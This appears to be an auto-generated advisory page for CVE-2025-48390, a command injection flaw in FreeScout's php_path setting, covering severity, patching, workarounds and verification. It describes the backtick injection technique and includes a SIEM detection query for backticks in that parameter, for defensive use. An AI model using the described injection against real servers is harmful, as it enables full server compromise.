CVE-2025-48390 – FreeScout versions before 1.8.178 contain a cod... (How to Fix)

Q: What is the severity of CVE-2025-48390?

CVE-2025-48390 has a CVSS score of 7.2 (HIGH). FreeScout versions before 1.8.178 contain a code injection vulnerability in the php_path parameter. Administrators can exploit this to execute arbitrary system commands via backticks, potentially leading to full server compromise. Only FreeScout instances with administrator accounts are affected.

📋 TL;DR

FreeScout versions before 1.8.178 contain a code injection vulnerability in the php_path parameter. Administrators can exploit this to execute arbitrary system commands via backticks, potentially leading to full server compromise. Only FreeScout instances with administrator accounts are affected.

💻 Affected Systems

Products:

FreeScout

Versions: All versions prior to 1.8.178

Operating Systems: All platforms running PHP

Default Config Vulnerable: ⚠️ Yes

Notes: Requires administrator role access to exploit. Self-hosted instances only.

📦 What is this software?

Freescout by Freescout

View all CVEs affecting Freescout →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full server compromise with attacker gaining root/system privileges, data exfiltration, ransomware deployment, or complete system takeover.

🟠

Likely Case

Unauthorized command execution leading to data theft, installation of backdoors, or lateral movement within the network.

🟢

If Mitigated

Limited impact due to proper access controls, but still potential for data exposure if exploited.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires administrator credentials. The vulnerability is straightforward to exploit once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.8.178

Vendor Advisory: https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-5324-cw55-gwj5

Restart Required: No

Instructions:

1. Backup your FreeScout installation and database. 2. Download version 1.8.178 from the official repository. 3. Replace all files with the new version. 4. Clear any caches if applicable.

🔧 Temporary Workarounds

Input Sanitization

all

Manually sanitize php_path parameter input to remove backticks and other dangerous characters

Edit tools.php to add input validation before file_exists() calls

Access Restriction

all

Temporarily restrict administrator access to only trusted users

🧯 If You Can't Patch

Immediately revoke administrator privileges from all non-essential users
Implement network segmentation to isolate FreeScout server from critical systems

🔍 How to Verify

Check if Vulnerable:

Check FreeScout version in admin panel or by examining version files. If version is below 1.8.178, system is vulnerable.

Check Version:

grep -r 'version' /path/to/freescout/app/Config/app.php | grep -i version

Verify Fix Applied:

Confirm version is 1.8.178 or higher in admin panel. Test php_path parameter with backticks to ensure no command execution occurs.

📡 Detection & Monitoring

Log Indicators:

Unusual administrator activity
php_path parameter containing backticks in access logs
Unexpected system command execution in server logs

Network Indicators:

Unusual outbound connections from FreeScout server
Suspicious file transfers

SIEM Query:

source="freescout_logs" AND (php_path CONTAINS "`" OR command="file_exists")

📊 Metadata

CVE ID: CVE-2025-48390

CVSS v3 Score: 7.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

EPSS Score: 0.4% exploit probability (59.9th percentile)

Published: May 29, 2025

Last Updated: July 11, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-48390, you might also want to check these: